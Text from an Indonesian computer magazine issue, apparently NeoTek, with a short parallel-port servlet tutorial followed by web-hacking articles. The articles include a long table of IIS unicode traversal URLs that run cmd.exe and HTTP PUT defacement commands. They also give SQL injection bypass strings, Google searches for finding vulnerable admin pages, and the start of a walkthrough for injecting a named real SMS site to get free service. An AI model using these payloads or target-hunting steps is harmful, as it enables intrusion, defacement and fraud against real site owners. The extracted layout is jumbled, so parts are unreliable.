NeoTek Vol. IV No. 05

NeoTutor
Yang perlu diperhatikan adalah kita harus me-reset Data Port ketika servlet pertama kali dipanggil sejak server dihidupkan. Hal ini karema ketika komputer dihidupkan, BIOS melakukan self-test yang salah satunya adalah untuk paralel port. Untuk keperluan itu, gunakan method init(). Method init() hanya dijalankan sekali ketika servlet dipanggil pertama kali sejak server (dalam hal ini Tomcat) dihidupkan. Untuk menyalakan atau memadamkan LED mudah saja, yaitu dengan memanfaatkan operasi-operasi logika sederhana. Untuk menyalakan LED, digunakan operasi OR dengan 1. Sedangkan untuk memadamkan LED, dipergunakan operasi AND dengan 0. Untuk lebih jelasnya, Tabel 3. Tabel 3. A
0 0 1 1

Pada address bar ketik http://localhost/remote (Gambar 3), lalu pilih, Baca Status LED (Gambar 4). Yang perlu diperhatikan adalah semua LED harus dalam keadaan padam, karena kondisi tersebut merupakan hasil inisialisasi (method init()).

Gambar 3 dan 4.

B
0 1 0 1

A or B
1 1 1 0

A and B
0 0 0 1

Sebelum meng-compile-nya, jangan lupa untuk mengcopy file myIO.class ke folder classes dan _io_.dll ke C:\WINDOWS (jangan salah!); serta atur setting untuk CLASSPATH sebagai berikut:
set CLASSPATH= C:\jakarta-tomcat-3.2.3\lib\servlet.jar;C:

Dapat juga gunakan DEBUG untuk menguji, apakah perubahan pada Data Port terbaca oleh servlet. Sebagai contoh, pada DEBUG berikan perintah o378, aa (Gambar 5), lalu, pada browser lakukan refresh untuk melihat hasilnya (Gambar 6).

Kini, anda dapat meng-compile-nya menggunakan perintah:
javac myParalel.java

Untuk membuat aliasnya, ketikkan file web.xml pada folder WEB-INF dengan isi sebagai berikut:
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN" "http://java.sun.com/j2ee/dtds/web-app_2_2.dtd"> <web-app> <servlet> <servlet-name> myParalel </servlet-name> <servlet-class> myParalel </servlet-class> </servlet> <servlet-mapping> <servlet-name> myParalel </servlet-name> <url-pattern> /myRemote </url-pattern> </servlet-mapping> </web-app>

Gambar 5 dan 6.

Sekarang, kita menguji penulisan ke Data Port, sehingga pada index.html pilih Ganti Status LED. Lalu isi form yang tersedia (Gambar 7), klik button Ganti dan hasilnya sebagai Gambar 8. Untuk melihat perubahannya mengunakan DEBUG, ketikkan perintah i378 (Gambar 9):

Penutup
Aplikasi yang disajikan sederhana saja dengan maksud agar anda dapat memahaminya dengan mudah. Dengan sedikit kreativitas, anda dapat mengembangkan aplikasi ini. Misalkan, untuk rangkaiannya digunakan microcontroller dengan memanfaatkan serial port sebagai media komunikasi antara PC dengan microcontroller untuk mengerjakan tugas-tugas yang lebih kompleks. Karena aplikasi ini menggunakan protokol HTTP, maka dengan sedikit modifikasi Anda dapat membuatnya sebagai aplikasi WAP, sehingga terciptalah pengendalian jarak jauh berbasis WAP.

Kini, anda dapat menjalankan Tomcat:
C:\jakarta-tomcat-3.2.3\bin\startup
Gambar 2

Pengujian
Anda dapat memasang rangkaian berikut pada soket untuk printer yang terdapat pada PC Anda (Gambar 2). Jika Anda tidak sempat membuat rangkaian tersebut, Anda dapat memanfaatkan DEBUG untuk melakukan pengujian. Ada dua buah perintah yang akan kita gunakan, yaitu: I untuk membaca dari suatu alamat port dan O untuk menulis ke suatu alamat port. Keterangan lengkapnya bisa Anda dapatkan dengan mengetikkan perintah ?.
Gambar7, 8, dan 9

Vol. IV No. 05 NeoTek

21

NeoTekno

Kerawanan pada Port 80
World Wide Web merupakan bagian dari Internet yang paling populer, sehingga serangan paling banyak terjadi lewat port 80 atau yang dikenal sebagai web hacking, berupa deface situs, SQL injection, serta memanfaatkan kelemahan scripting maupun HTML form.
di Universitas Pelita Harapan yang dibawakan oleh S'to dari Jasakom. Terimakasih kepada S'to yang telah memberikan izin menggunakan makalahnya untuk ditulis ulang menjadi artikel ini. Bicara mengenai web hacking, artikel ini membahasnya W dengan pendekatan 5W+1H (What, Who, Why, When, and Where + How). Jika salah urutan tak mengapalah.

WE B HAC K I N G

A

RTIKEL INI DIANGKAT DARI BAHAN SEMINAR SECURITY

WHAT: Apa itu Web Hacking?
Web hacking..., bukan hal baru lagi bagi jawara internet (hacker) baik aliran putih maupun aliran hitam (cracker). Apakah yang dimaksud dengan web hacking? Untuk menw dapatkan definisi kedua kata tersebut (web dan hacking) juga sebenarnya lumayan pusing. Secara semantik, web didefinisikan menjadi Data yang direpresentasikan di world wide web (Tim Berners-Lee, James Hendler, Ora Lassila. Scientific American, May 2001). Adapun hacking didefinisikan menjadi Tindakan di luar otoritas atau tindakan mematahkan/membobol mekanisme keamanan sebuah sistem informasi atau sistem jaringan h (http://www.tsl.state.tx.us/ld/pubs/compsecurity/glossary.html). Jadi, singkatnya web hacking dapat diartikan Tindakan menerobos mekanisme keamanan dari suatu sistem yang direpresentasikan dalam world wide web.

Internet merebak harum di Indonesia, bisa dikatakan mulai pada hitungan tahun 90-an. Internet yang sebelumnya merupakan sebagai hal yang mustahil untuk dirasakan oleh rakyat kelas bawah, semakin terjangkau dengan larismanisnya bermunculan warnet (warung internet). Ada ujaran yang mengatakan Kejahatan ada karena ada kesempatan. Ujaran tersebut mungkin belum dapat ditujukan kepada pelaku web hacking. Dengan banyaknya kehadiran warnet bahkan ada yang buka 24 jam, membuat web hacking dapat dilakukan kapan saja dan dimana saja, tanpa harus menunggu waktu.

HOW: Bagaimana Web Hacking Dilakukan?
Bagaimana seseorang melakukan web hacking? Internet sudah hampir menjangkau segala sisi kehidupan yang ada di dunia ini. Informasi mengenai web hacking dapat anda temukan dengan berselancar ke Google. Google, search engine yang terkenal menjawab pertanyaan Bagaimana. Dengan memasukkan kata (keyword) pada baris isian pencarian maka anda akan dibawa ke tempat-tempat yang berhubungan dengan web hacking. Anda tinggal memilih dan menyaringnya. Seperti yang telah disinggung di atas, pelaku web hacking dapat siapa saja dan tanpa ada syarat-syarat tertentu. Hal ini disebabkan karena di internet terdapat banyak informasi yang dapat diperoleh termasuk mengenai soal web hacking. Informasi dapat berupa tutorial, tools, dan lain sebagainya hingga akan membuat web hacking benar-benar mudah untuk dilakukan.

WHO: Siapa yang Melakukan Web Hacking?
Menerobos mekanisme keamanan suatu jaringan, bukanlah tindakan yang gampang untuk dilakukan. Jadi, siapakah pelaku web hacking tersebut? Seiring perkembangan internet yang benar-benar pesat dan diiringi perkembangan security dan underground, membuat siapa saja dapat menjadi pelaku. Tidak ada keharusan bahwa pelaku web hacking adalah orang yang pintar komputer dan internet, atau lain sebagainya. Anda, saya, atau dia bisa saja menjadi pelakunya.

Unicode Bug pada Microsoft IIS
Untuk lebih menjelaskannya, mari kita tinjau masalah HOW dari web hacking dengan bentuk studi kasus. Sebagai bahan studi kita yaitu e-commerce web. Mengapa pilihan ditetapkan e-commerce web? Karena e-commerce web merupakan pilihan yang populer di kalangan para pelaku web hacking. Gambar 1 menunjukkan contoh situs dalam studi kasus kita.

WHY: Mengapa Melakukan Web Hacking?
Jika semua bisa menjadi pelaku web hacking, tentu ada alasan jika sampai melakukannya dan pertanyaan adalah Mengapa? Jika pertanyaannya adalah Mengapa, biasanya jawabannya adalah Karena. Ada banyak alasan orang melakukan web hacking, diantaranya adalah: 1. Wanna Be A Hacker (ingin menjadi seorang hacker). 2. Mendapatkan popularitas. 3. Ingin mendapat puijian. Alasan-alasan tersebut di atas cukup bisa dicerna logika. Tapi bagaimana dengan alasan-alasan yang unik seperti Nggak ada kerjaan, Suka-suka, Apa urusan loe, dan lain sebagainya. Menurut hemat penulis, tanpa suatu alasan apapun seseorang dapat saja melakukan web hacking.

WHEN and WHERE: Kapan dan Dimana?
22

Gambar 1. Situs e-commerce dalam studi kasus kita.

NeoTek Vol. IV No. 05

NeoTekno

Gambar 3. Dengan TFTP, web hacker meng-upload halaman web yang sudah disiapkannya menggantikan yang asli. Gambar 2. Situs e-commerce yang terkena deface. Tabel 1. Daftar unicode bug
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ /msdac/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ /msdac/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ /msdac/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ /msdac/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%../winnt/system32/cmd.exe?/c+dir+c:\ /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\ /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ /_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ /adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c+dir+c:\ /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c: /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

Suatu hari, pelanggan membuka situs web tersebut, dan melihat tampilan yang sama sekali berbeda dibandingkan sebelumnya. Web hacking telah terjadi. Halaman utama e-commerce d web ini telah telah di-deface oleh seseorang yang bernama B4d53ct0r. Bagaimana hal ini terjadi? Deface banyak terjadi pada situs e-commerce web yang menggunakan MS IIS. Ini dikarenakan adanya bug pada IIS yang dikenal sebagai unicode bug. Dengan adanya bug ini seseorang dapat mengakses command line shell cmd.exe pada server keluarga Windows NT. Kelemahan IIS ini sempat ramai dibicarakan orang karena banyaknya korban. Megakses server dengan memanfaatkan unicode bug itu sendiri dilakukan melalui service HTTP (port 80), port yang pasti dibuka untuk memberikan layanan web. Tabel 1 menunjukkan daftar unicode bug yang dapat digunakan oleh pelaku web hacking untuk menembus Server IIS. Pada kasus, setelah berhasil masuk ke sistem, pelaku web hacking menggunakan tool TFTP untuk melakukan transfer terhadap halaman web dengan desain ‘kreatif’ yang dimilikinya untuk mengubah tampilan web target.

Vol. IV No. 05 NeoTek

23

NeoTekno
Men-deface situs web lewat bug unicode Microsoft IIS ini pernah dibahas cukup terinci di NeoTek III/03. Untuk itu silakan download file format PDF dari artikel ini lewat arsip NeoTek di www.neotek.co.id. Dengan memanfaatkan hanya perintah-perintah dasar dari HTTP, seorang hacker dapat men-deface suatu situs web. Berikut ini adalah perintah-perintah yang dijalankannya: OPTIONS * HTTP/1.1 PUT /file.ext HTTP/1.1 Host: hostname Content-Length: jumlahkarakter data yang dikirim Terlihat bahwa hal ini terjadi karena setting server yang tidak sempurna. Untuk itu perlu dilakukan beberapa hal: • Setting untuk menulis dari HTTP dihilangkan • Menggunakan security template dari Microsoft, NSA, dan lain sebagainya. • Menggunakan berbagai dokument setting server agar aman

Opsi Baca/Tulis pada Protokol HTTP
Untuk mengamanankan sever IIS dari deface, server harus secara berkala di-update dengan sercvice pack dan hotfix terbaru. Lebih baik lagi kalau situs e-commerce itu juga dilindungi oleh firewall dan IDS (intrusion detection system). Tapi semua itu ternyata belum menjamin keamanan situs ecommerce dari deface. Seperti pada contoh kasus kita, ternyata setelah semua usaha di atas, ternyata masih terkena deface juga. Walaupun kini deface yang terjadi tidak terlalu mempunyai nilai seni, tetapi tetap efektif (Gambar 4).

SQL Injection
Setting server dengan benar memang akan mengamankan e-commerce web dari serangan deface, tetapi bukan berarti semuanya sudah aman sekarang. Situs e-commerce yang menggunakan Microsoft IIS juga menggunakan database access dengan Micosoft SQL server dan dibandingkan dengan SQL server yang lain, MS SQL server mempunyai kelemahan yang memungkinkan seseorang tanpa account dapat masuk dan lolos verifikasi dari MS SQL server.. Dari segi kerugian, hal ini lebih serius, sebab bisa saja data sensitif seperti nomor kartu kredit serta lainnya bocor! Pada saat seseorang berusaha masuk ke situs e-commerce, biasanya akan disambut dengan halaman login yang mengharuskan pemakai memasukkan login name dan password (Gambar 5).

Gambar 4. Masih bisa terkena deface, padahal sudah menginstal Service Pack dan hotfix terbaru dari Microsoft, serta melindungi server dengan firewall dan IDS.

Bagaimana hal ini bisa terjadi? Hal ini dapat terjadi karena setting pada protokol HTTP 1.0 atau HTTP 1.1 yang merupakan protokol utama untuk web itu sendiri, yaitu adanya opsi untuk dapat membaca dan menulis lewat protokol-protokol ini.
HTTP 1.0 RFC 1945 (http://www.ietf.org/rfc/rfc1945.txt) Finalized May 1996 Didukung oleh sebagian besar Web server dan browser HTTP 1.1 RFC 2616 (http://www.ietf.org/rfc/rfc2616.txt) Finalized 2001 Standard Baru Komunikasi Web Gambar 5. Layar login user name dan password serta perintah-perintah SQL dibaliknya untuk verfikasi.

Beberapa perintah HTTP 1.0 GET Untuk mengambil informasi dari sistem, seperti halaman html GET /default.htm HTTP/1.0 HEAD Untuk mengambil informasi mengenai system HEAD HTTP/1.0 (untuk menentukan OS/WEB) POST Mengirimkan Informasi ke sistem Perintah-perintah yang didukung HTTP 1.1. CONNECT*, DELETE*, GET, HEAD, OPTIONS, POST, PUT, TRACE
24

Setelah pemakai memasukkan username dan password, secara umum SQL akan melakukan verfikasi terpadap SQL query sebagai berikut: SQLQuery = "SELECT Username FROM Users WHERE Username = '" & strUsername & "' AND Password = '" & strPassword & "'“ Kelemahan verifikasi MS SQL disini mirip dengan kelemahan unicode bug, yaitu tetap memproses (dengan bingung) input-input ilegal pada username dan menghasilkan error page. Pada error page ini akan terbaca struktur database-nya. Jadi kalau username-nya diisikan karakter-karakter ilegal seperti misalnya:

NeoTek Vol. IV No. 05

NeoTekno
‘ OR ‘ ‘= dan untuk password-nya disikan juga ‘ OR ‘ ‘= maka SQL query akan membacanya sebagai: SELECT Username FROM Users WHERE Username = ‘ ‘ OR ‘ ‘=‘ ‘ AND Password = ‘ ‘ OR ‘ ‘=‘ ‘ yang artinya SQL query akan memvalidasi username kosong (blank) dan password kosong sebagai user yang sah. Keberhasilan SQL Injection ditandai dengan adanya ODBC error, internal server error, masalah dalam memproses request, syntax error, dan lain sebagainya. Untuk mengatasi hal ini, atur agar: • Hanya karakter tertentu yang boleh diinput. • Jika terdeteksi adanya illegal character, langsung tolak permintaan. Contoh scripting language yang bekerja di sisi client: • JavaScript • Client side VB Script Adapun scripting language di sisi server:L • ASP (Active Server Pages_ • JSP (Java Server Pages) • PHP (Personal Home Page)

Kelemahan Dasar HTML Form
Setelah semua di atas diatasi, juga masih belum semuanya setaus persen aman. Pasalnya HTML sendiri, bahasa universal yang digunakan oleh web mempunyai karakteristik yang bisa disalahgunakan. Formulir dalam format HTML (HTML Form) adalah tampilan yang digunakan untuk menampilkan jendela untuk memasukkan username dan password. Setiap HTML form harus menggunakan salah satu metode pengisian formulir, yaitu GET atau POST. Berikut ini adalah kode HTML dari suatu login form:
<form method=POST action=’/cgi-bin/login.cgi”> <table border=0> <tr> <td>username:</td> <td>input name=user type=text width=20></td> </tr> <tr> <td>password:</td> <td>input name=pass type=password width=20></td> </tr> </table> <input type=submit value=”login”> </form>

Angka Minus dalam Program Bisnis
Pengamanan terhadap kelemahan SQL query bukan berarti suatu situs e-commerce sudah aman. Yang banyak terjadi adalah bahwa suatu situs e-commerce secara desain memang sudah tidak aman. Hal ini terutama pada situssitus yang menggunakan scripting language. Pada kebanyakan program bisnis, tanda minus digunakan untuk menandai pembayaran, sedangkan pemesanan barang tentunya tidak ada yang menggunakan tanda minus. Tetapi cukup banyak situs e-commerce yang didesain secara ceroboh dan tetap memproses tanda minus pada jumlah barang yang dipesan, misalnya. Hal ini apabila dilakukan dengan kreatif, yaitu mengkombinasikan pesanan dengan jumlah barang negatif dan jumlah barang lain yang positif, dalam prosesnya bisa mengakibatkan pengiriman barang dilakukan tanpa mengharuskan adanya pembayaran.

Melalui kedua metode HTTP ini (GET atau POST) parameter disampaikan ke aplikasi di sisi server. Masalahnya dengan menggunakan GET, variabel yang digunakan akan terlihat pada kotak URL, yang memungkinkan pengunjung langsung memasukkan karakter pada form process, selain juga perintah GET dibatasi oleh string sepanjang 2047 karakter. Variabel juga dapat diambil dengan Request.QueryString. POST biasa digunakan untuk mengirim data dalam jumlah besar ke aplikasi di sisi server, sehingga tidak menggunakan URL query string yang terbatas. POST juga lebih aman sebab variabel tidak terlihat oleh pengunjung, sehingga lebih sulit dimainkan lewat perubahan nama variabel. Namun variabel tetap dapat diambil dengan RequestForm.

Kesimpulan
• Hacking meliputi semua unsur dan tidak hanya pada satu sisi sistem operasi. • Tidak semua bug di ketahui pembuat software. • Kesalahan konfigurasi adalah masalah umum yang disebabkan penguasaan yang kurang atas suatu sistem • Menjadi hacker itu mudah; hanya menggunakan tools yang dibuat oleh hacker luar (script kiddies) • Tidak diperlukan pengertian akan network, TCP/IP, Assembly, C, dan lain-lain untuk menjadi Hacker • Programmer handal bisa dengan mudah menjadi hacker juga • Serangan tidak hanya melalui network layer, tapi juga application layer • 70% serangan melalui port 80/aplikasi • Kerugian terbesar berasal serangan dari orang dalam, dan 80% serangan dilakukan oleh orang dalam. Vol. IV No. 05 NeoTek
25

Gambar 6. JavaScript digunakan untuk memverifikasi angka minus.

JavaScript: Client Side Scripting
JavaScript sendiri merupakan suatu scripting language yang dieksekusi di sisi client (komputer pengguna), sehingga suatu transaksi yang menggunakan JavaScript sebagai scripting language-nya dapat dipastikan sangat rawan terhadap manipulasi dari sisi pemakai.

NeoTekno

Database Hacking: SQL Injection
Lebih lanjut mengenai web hacking, Andi Ismayadi (Fuzk3_kendi@yahoo.com) membahas lebih jauh tentang SQL Injection, sebagai oleh-olehnya dari tutorial on-line di IRC chatroom #neoteker di Dal.net.
internet dari unicode hingga yang baru-baru ini menggemparkan jagad maya yaitu RPC Dcom, sekarang muncul lagi satu lubang keamanan yang membahayakan sebuah websites. SQL Injection atau dikenal juga dengan SQL insertion adalah sebuah teknik yang digunakan untuk mengeksploitasi database pada suatu websites dengan memaksa keluarnya error page situs itu yang pada error pages itu terdapat info tentang struktur database website yang dieksploitasi. SQL sendiri merupakan bahasa pemrograman database yang sering dipakai para web developer maupun admin sebuah situs untuk menampung ataupun menaruh data-data baru dari suatu input yang masuk seperti input member login, search engine, dan lain sebagainya. Sebenarnya SQL injection sendiri bukanlah hal baru, dari dulu teknik ini sudah dikenal dalam dunia hacking sebagai salah satu teknik web hacking, namun baru muncul lagi sekarang karena sifatnya yang dapat merusak database dari suatu situs. Teknik yang digunakan dalam SQL Injection adalah dengan jalan menginput perintah-perintah standar dalam SQL (DDL, DML, DCL) seperti CREATE, INSERT, UPDATE, DROP, ALTER, UNION, SELECT dan perintah-perintah lainnya yang tak asing lagi bagi anda yang sudah mengenal SQL secara mendalam maupun yang baru saja belajar. Dari berbagai jenis SQL dari MySQL, PostgreSQL, Nuke SQL, dan MS-SQL, yang paling rentan terhadap SQL Injection adalah MS-SQL.

WE B HAC K I N G

S

ETELAH BANYAKNYA BUG-BUG YANG BETEBARAN DI

Gambar 1. Input string ' or 1=1-- yang berbahaya...

Jadi kalau diuraikan logikanya adalah bahwa SQL-nya menganggap 1=1 sebagai true sehingga kolom itu di-bypass

Gambar 2. Hasil input string itu membuat kita dapat akses admin

Bahaya Default Setting
Default setting SQl yang paling berbahaya adalah menggunakan adminID = sa dan password blank alias kosong, apabila ada direktori sebuah situs yang disitu ada input untuk adminnya maka kalau kita isi id-nya dengan = 'sa' dan passwordnya =' ' maka kita langsung masuk sebagai admin, ini kalau default setting-nya belum diubah. Namun ada lagi string yang bisa kita input untuk akses sebagai web admin yaitu dengan string ' OR 1=1-Nah apabila ada input web admin yang input box-nya adalah User dan Password maka apabila kita masukan string ' OR 1=1-- di input box user dan masukan foobar di input box password, maka akan membuat SQL query-nya bingung diakibatkan jadi SQL Query membacanya sebagai: SELECT * from users where User ='' or 1=1-- and Password ='foobar' yang artinya sqlnya men-SELECT semua query dari user yang user-nya '' (kosong) atau (OR) 1=1 (true) -(tanda -- adalah mark dari SQL seperti halnya di C/C++ mark-nya // atau /*)
26

lalu kolom password-nya diabaikan karena setelah 1=1 terdapat mark SQL ( -- ), sehingga password itupun diabaikan. Lalu apakah hanya itu string-nya dalam menginjeksi sebuah situs? Tentu saja tidak. Inti dari injeksi dalam langkah awalnya adalah memaksa keluar sebuah error page yang berisi informasi struktur database situs itu dan kalau kita ingin melihatnya kita harus men-debug-nya. Jadi yang kita masukkan adalah string debugging SQL code, yaitu ' having 1=1-- , ini adalah string yang harus dimasukkan kalau kita ingin melihat error page dari situs sasaran.

Mencari Target
Situs web MS-SQL dengan ASP adalah situs yang paling rentan terhadap serangan ini. Jadi bagaimana jika kita ingin mencari target yang menggunakan bahasa scripting ASP yang dapat kita serang? Seperti biasa buka www.google.com nah, di kolom keywordnya masukkan allinurl:.co.nz/admin.asp. Keyword ini dapat anda modifikasi ke berbagai bentuk tapi intinya allinurl: harus dimasukkan karena Google akan mencari semua URL dalam sebuah situs yang mempunyai direktori /admin.asp.

NeoTek Vol. IV No. 05

NeoTekno
Bisa saja anda ganti dengan allinurl:.co.id atau net atau org, or.id, sampai allinurl:.fr/admin.asp semua tergantung kreativitas anda dalam mencari target menggunakan Google, dan yang terpenting dari semua itu adalah anda harus tahu di mana harus menginput string SQL tadi, misalnya di member login, user login, dan bahkan dapat pula di search product.

Gambar 5. Sebuah situs e-commerce yang di-inject melalui URLnya dengan debuging code.

Gambar 3. Keyword allinurl dalam Google yang berguna sebagai alat bantu hacking anda.

Setelah itu akan keluar sebuah error page dari situs itu yang memberi informasi tentang struktur database situs itu. Dari hasil informasi yang kita dapat ini, kita dapat melakukan serangan berikutnya. Apabila browser kita adalah Internet Explorer, ada sebagian situs yang tidak menampilkan error-nya, ini dikarenakan opsi Show Friendly HTTP Error Messages diaktifkan. Untuk itu kita perlu menonaktifkannya dengan cara menghilangkan tanda centang di kotaknya. Opsi ini dapat anda temukan di Tools > Internet Option > Advanced cari opsinya di bagian Browsing lalu hilangkan tanda centangnya dan klik tombol Apply. Sesudah itu apabila anda menemui error page yang berisi HTTP 500 error internal server error- sebelum men-set opsi tadi, anda cukup menekan tombol Refresh, lalu terlihatlah sudah error-nya. Setelah kita tahu struktur database-nya, dengan pengetahuan dasar dari belajar SQL kita dapat menghancurkan database itu dengan perintah ' drop database [nama_database] atau drop table [nama_table], namun bukan ini yang kita cari dalam SQL Injection karena kita tidak dapat apa-apa dari string tadi.

Gambar 4. Hasil dari search tadi dapat me-reveal semua situs yang memiliki direktori khusus seperti admin login.

Lokasi SQL Injection
Lalu apakah setiap situs target kita harus di-inject lewat input box-nya? Tidak juga. Kita bisa memasukan string-string SQL di URL situs target. Misalnya ada sebuah situs www.target.com/moreinfo.cfm?ProductID=245 Nah, ketikkan string injeksi debuging SQL tadi ke address bar anda dibelakang url target itu, contohnya: www.target.com/moreinfo.cfm?ProductID=245' having 1=1-atau juga anda hapus nilai produk dari URL tersebut dan ganti dengan debugging codenya, sebagai contoh: www.target.com/moreinfo?ProductID=' having 1=1--

Gambar 6. Error page yang menampilkan informasi berharga tentang database sasaran.

Vol. IV No. 05 NeoTek

27

NeoTekno
Praktek SQL Injection
Bagaimana misalnya kalau anda menemukan sebuah situs yang menyediakan jasa kirim SMS dari web, namun setiap SMS ada perhitungannya dalam sebuah string, dan kita harus membayar dengan kartu kredit. Kita tidak akan melakukan carding disini, namun kita dapat meng-inject database-nya agar string SMS tadi diberi nilai dan bisa dipakai untuk mengirim SMS. Untuk mengetahui lebih lanjut dari serangan SQL Injection, perhatikan SQL Injection dari sebuah situs yang memberi layanan SMS web ke handphone ini. Disini akan dijelaskan string dasar SQL yang dapat berubah menjadi hal yang membahayakan suatu situs.
1. Cari target dengan Google, keywordnya allinurl:.com/sendsms.asp. Inilah URL yang sering dipakai oleh web site yang menyediakan jasa mengirim SMS. 4. Setelah itu anda klik OK, dan account anda telah terbentuk.

2. Dalam contoh ini kita pakai www.yepcell.com, situs ini adalah sebuah situs dari Timur Tengah yang menyediakan jasa pengiriman sms ke seluruh penjuru dunia dan menyediakan aksesori handphone seperti, ringtone dan gambar.

